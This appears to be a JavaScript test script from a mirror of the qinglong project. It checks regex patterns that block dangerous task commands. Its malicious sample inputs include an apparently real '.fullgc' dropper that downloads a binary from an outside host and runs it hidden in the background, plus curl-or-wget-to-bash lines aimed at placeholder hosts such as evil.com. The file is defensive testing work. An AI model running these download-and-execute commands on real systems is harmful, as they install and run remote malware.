mirror of
https://github.com/whyour/qinglong.git
synced 2026-02-12 14:05:38 +08:00
140 lines
4.5 KiB
JavaScript
Executable File
140 lines
4.5 KiB
JavaScript
Executable File
#!/usr/bin/env node
|
|
|
|
/**
|
|
* Simple test script to validate security patterns
|
|
* This tests the regex patterns used in the security validation
|
|
*/
|
|
|
|
console.log('Testing Security Validation Patterns\n');
|
|
console.log('=====================================\n');
|
|
|
|
// Define the dangerous patterns (copied from our implementation)
|
|
const dangerousPatterns = [
|
|
{ name: 'Command substitution $(...)', pattern: /\$\([^)]*\)/ },
|
|
{ name: 'Command substitution backticks', pattern: /`[^`]*`/ },
|
|
{ name: 'File downloads', pattern: /\b(curl|wget|fetch)\s+/i },
|
|
{ name: 'External URLs', pattern: /https?:\/\/[^\s]+/i },
|
|
{ name: 'Hidden executable files', pattern: /\/\.\w+(\s|$|;|&|\||>)/ },
|
|
{ name: 'Background process with hidden file', pattern: /nohup\s+["']?[^\s"']*\/\.\w+/ },
|
|
{ name: 'Redirect to dev null with background', pattern: />.*\/dev\/null.*&/ },
|
|
{ name: 'Base64/decode/eval', pattern: /\b(base64|decode|eval)\s+/i },
|
|
{ name: 'Temp directory execution', pattern: /\b\/tmp\/[^\s]+/ },
|
|
];
|
|
|
|
// Test cases - malicious patterns that should be blocked
|
|
const maliciousInputs = [
|
|
{
|
|
name: 'Original .fullgc malware',
|
|
input: 'd="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";curl -fsSL -o "$b" "$u"&&chmod +x "$b"&&nohup "$b" >/dev/null 2>&1 &',
|
|
},
|
|
{
|
|
name: 'Command substitution with curl',
|
|
input: 'echo $(curl http://evil.com/malware.sh | bash)',
|
|
},
|
|
{
|
|
name: 'Backtick command substitution',
|
|
input: 'echo `wget -O- http://evil.com/script.sh`',
|
|
},
|
|
{
|
|
name: 'Download and execute',
|
|
input: 'curl http://malicious.com/script.sh | bash',
|
|
},
|
|
{
|
|
name: 'Download, chmod, and execute',
|
|
input: 'wget http://bad.com/malware && chmod +x malware && ./malware',
|
|
},
|
|
{
|
|
name: 'Hidden file execution',
|
|
input: 'nohup /data/db/.malware >/dev/null 2>&1 &',
|
|
},
|
|
{
|
|
name: 'Base64 encoded payload',
|
|
input: 'echo SGVsbG8gV29ybGQ= | base64 -d | bash',
|
|
},
|
|
];
|
|
|
|
// Test cases - legitimate patterns that should be allowed
|
|
const legitimateInputs = [
|
|
{
|
|
name: 'Simple script execution',
|
|
input: 'node script.js',
|
|
},
|
|
{
|
|
name: 'Python script',
|
|
input: 'python3 my_script.py',
|
|
},
|
|
{
|
|
name: 'Shell script with arguments',
|
|
input: 'bash update.sh --force',
|
|
},
|
|
{
|
|
name: 'Environment variable',
|
|
input: 'export MY_VAR=value',
|
|
},
|
|
{
|
|
name: 'Echo statement',
|
|
input: 'echo "Task started"',
|
|
},
|
|
];
|
|
|
|
function testPattern(input, patterns) {
|
|
for (const { name, pattern } of patterns) {
|
|
if (pattern.test(input)) {
|
|
return { blocked: true, reason: name, pattern: pattern.source };
|
|
}
|
|
}
|
|
return { blocked: false };
|
|
}
|
|
|
|
console.log('Testing Malicious Inputs (should be BLOCKED):');
|
|
console.log('==============================================\n');
|
|
|
|
let maliciousBlocked = 0;
|
|
maliciousInputs.forEach(({ name, input }) => {
|
|
const result = testPattern(input, dangerousPatterns);
|
|
const status = result.blocked ? '✓ BLOCKED' : '✗ ALLOWED';
|
|
const color = result.blocked ? '\x1b[32m' : '\x1b[31m';
|
|
console.log(`${color}${status}\x1b[0m - ${name}`);
|
|
if (result.blocked) {
|
|
console.log(` Reason: ${result.reason}`);
|
|
maliciousBlocked++;
|
|
} else {
|
|
console.log(` ⚠️ WARNING: This malicious pattern was not blocked!`);
|
|
}
|
|
console.log(` Input: ${input.substring(0, 100)}${input.length > 100 ? '...' : ''}\n`);
|
|
});
|
|
|
|
console.log('\nTesting Legitimate Inputs (should be ALLOWED):');
|
|
console.log('===============================================\n');
|
|
|
|
let legitimateAllowed = 0;
|
|
legitimateInputs.forEach(({ name, input }) => {
|
|
const result = testPattern(input, dangerousPatterns);
|
|
const status = !result.blocked ? '✓ ALLOWED' : '✗ BLOCKED';
|
|
const color = !result.blocked ? '\x1b[32m' : '\x1b[31m';
|
|
console.log(`${color}${status}\x1b[0m - ${name}`);
|
|
if (result.blocked) {
|
|
console.log(` ⚠️ WARNING: This legitimate pattern was incorrectly blocked!`);
|
|
console.log(` Reason: ${result.reason}`);
|
|
} else {
|
|
legitimateAllowed++;
|
|
}
|
|
console.log(` Input: ${input}\n`);
|
|
});
|
|
|
|
console.log('\nTest Summary:');
|
|
console.log('=============');
|
|
console.log(`Malicious patterns blocked: ${maliciousBlocked}/${maliciousInputs.length}`);
|
|
console.log(`Legitimate patterns allowed: ${legitimateAllowed}/${legitimateInputs.length}`);
|
|
|
|
const success = maliciousBlocked === maliciousInputs.length &&
|
|
legitimateAllowed === legitimateInputs.length;
|
|
|
|
if (success) {
|
|
console.log('\n\x1b[32m✓ All tests passed!\x1b[0m');
|
|
process.exit(0);
|
|
} else {
|
|
console.log('\n\x1b[31m✗ Some tests failed!\x1b[0m');
|
|
process.exit(1);
|
|
}
|